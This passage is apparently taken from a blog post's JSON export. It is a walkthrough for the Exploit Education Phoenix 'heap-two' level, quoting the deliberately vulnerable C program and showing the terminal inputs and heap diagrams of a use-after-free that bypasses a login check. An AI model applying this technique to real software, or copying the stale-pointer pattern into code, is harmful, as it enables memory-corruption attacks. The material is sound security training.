line<\/strong> and prints the banner:<\/p>\nstruct auth {\r\n char name[32];\r\n int auth;\r\n};\r\n\r\nstruct auth *auth;\r\nchar *service;\r\n\r\nint main(int argc, char **argv) {\r\n char line[128];\r\n\r\n printf("%s\\n", BANNER);\r\n ...<\/pre>\nIn the heart of the program is an infinite while loop. This loop prints the current values of the auth & service pointers, waits for user input, and uses several if<\/strong> statements to give the user a list of commands to run. The possibilities are auth, reset, service, and login:<\/p>\n ...\r\n while (1) {\r\n printf("[ auth = %p, service = %p ]\\n", auth, service);\r\n\r\n if (fgets(line, sizeof(line), stdin) == NULL) break;\r\n\r\n if (strncmp(line, "auth ", 5) == 0) {\r\n auth = malloc(sizeof(struct auth));\r\n memset(auth, 0, sizeof(struct auth));\r\n if (strlen(line + 5) < 31) {\r\n strcpy(auth->name, line + 5);\r\n }\r\n }\r\n if (strncmp(line, "reset", 5) == 0) {\r\n free(auth);\r\n }\r\n if (strncmp(line, "service", 6) == 0) {\r\n service = strdup(line + 7);\r\n }\r\n if (strncmp(line, "login", 5) == 0) {\r\n if (auth && auth->auth) {\r\n printf("you have logged in already!\\n");\r\n } else {\r\n printf("please enter your password\\n");\r\n }\r\n }\r\n }\r\n}<\/pre>\nIf the first 5 characters of user input equals "auth "<\/span>, then several other things happen. Memory is allocated on the heap for the auth<\/strong> struct, it’s initialized with null bytes, and if the length of user input after the command is less than 31, then it’s saved to the struct’s name<\/strong> variable.<\/p>\nIf the first 5 characters of user input equals "reset"<\/span>, then the heap space memory for the auth<\/strong> struct is freed.<\/p>\nIf the first 6 characters of user input equals "servic"<\/span> (I’m not sure why this doesn’t include the last letter of “service”, perhaps a typo?), then all user input after the first 7 characters is saved to the heap with the service<\/strong> variable pointing to it.<\/p>\nIf the first 5 characters of user input equals "login"<\/span>, then an additional check occurs. If the auth<\/strong> struct is defined as well as the auth->auth<\/strong> member (integer variable), then we complete the level with the message, “you have logged in already!” Otherwise, we’ll get the message, “please enter your password.”<\/p>\nWe can actually use these commands, one at a time and in order, to solve this level. But first, it’s important to understand the layout of memory in the heap for these variables. When memory is allocated for the auth<\/strong> struct, it will reserve 36 bytes on the heap. 32 for the auth->name<\/strong> “string” and 4 for the auth->auth<\/strong> integer. The program doesn’t allow us to directly modify the integer (and a good thing too or else this wouldn’t be a challenge), but if it did, this would be saved right after the 32 bytes for the name<\/strong> variable. When the free() <\/span>function is used (with a pointer to that space as an argument), those 36 bytes on the heap are now available for use. In this case, the next time malloc() <\/span>or strdup() <\/span>is called, those bytes will be re-used.<\/p>\nWith that in mind, I present the solution. First, I get the auth<\/strong> struct initialized with the “auth” command using any ‘ol value (in this case, a single ‘A’). Next, I free the heap space using the “reset” command. Note, however, that this does not remove, delete, or change the auth<\/strong> pointer in any way. This is now what’s called a “stale pointer.” Then I’ll use the “service” command to save any ‘ol value to the heap that’s at least<\/em> 32 bytes long (in this case, 32 ‘B’s). This will write data into the space that was once used for the auth->auth<\/strong> integer. If, exactly, 32 bytes is used, then that space will hold the newline character (0x0a) that’s saved at the end of the user input. Finally, I’ll use the “login” command to verify that this worked:<\/p>\nuser@phoenix-amd64:~$ \/opt\/phoenix\/i486\/heap-two\r\nWelcome to phoenix\/heap-two, brought to you by https:\/\/exploit.education\r\n[ auth = 0, service = 0 ]\r\nauth A\r\n[ auth = 0x8049af0, service = 0 ]\r\nreset\r\n[ auth = 0x8049af0, service = 0 ]\r\nserviceBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB \r\n[ auth = 0x8049af0, service = 0x8049af0 ]\r\nlogin\r\nyou have logged in already!<\/pre>\nI also wanted to provide a bit of a visual with what’s happening in the heap:<\/p>\n
Heap space after "auth A" command:\r\n ADDRESS VALUE\r\n +------------+\r\n0x08049af0 | 0x00000a41 | <= auth->name variable (char)\r\n0x08049af4 | 0x00000000 |\r\n0x08049af8 | 0x00000000 |\r\n0x08049afc | 0x00000000 |\r\n0x08049b00 | 0x00000000 |\r\n0x08049b04 | 0x00000000 |\r\n0x08049b08 | 0x00000000 |\r\n0x08049b0c | 0x00000000 |\r\n0x08049b10 | 0x00000000 | <= auth->auth variable (int)\r\n +------------+\r\n\r\nHeap space after "service" + 32x'B' command:\r\n ADDRESS VALUE\r\n +------------+\r\n0x08049af0 | 0x42424242 | <= auth->name variable (char)\r\n0x08049af4 | 0x42424242 |\r\n0x08049af8 | 0x42424242 |\r\n0x08049afc | 0x42424242 |\r\n0x08049b00 | 0x42424242 |\r\n0x08049b04 | 0x42424242 |\r\n0x08049b08 | 0x42424242 |\r\n0x08049b0c | 0x42424242 |\r\n0x08049b10 | 0x0000000a | <= auth->auth variable (int)\r\n +------------+<\/pre>\nAs you can see, that last newline character (0x0a) has now changed the former auth->auth<\/strong> variable. This program demonstrates what’s called a Use After Free vulnerability This happens when data on the heap is freed, but a leftover reference or “stale pointer” is used by the code as if the data were still valid.<\/p>\n","protected":false},"excerpt":{"rendered":"This level explores why you should always explicitly initialize your allocated memory, and what can occur when pointer values go stale … Continue readingExploit Education | Phoenix | Heap Two Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-644","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/644","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=644"}],"version-history":[{"count":19,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/644\/revisions"}],"predecessor-version":[{"id":694,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/644\/revisions\/694"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=644"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=644"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=644"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}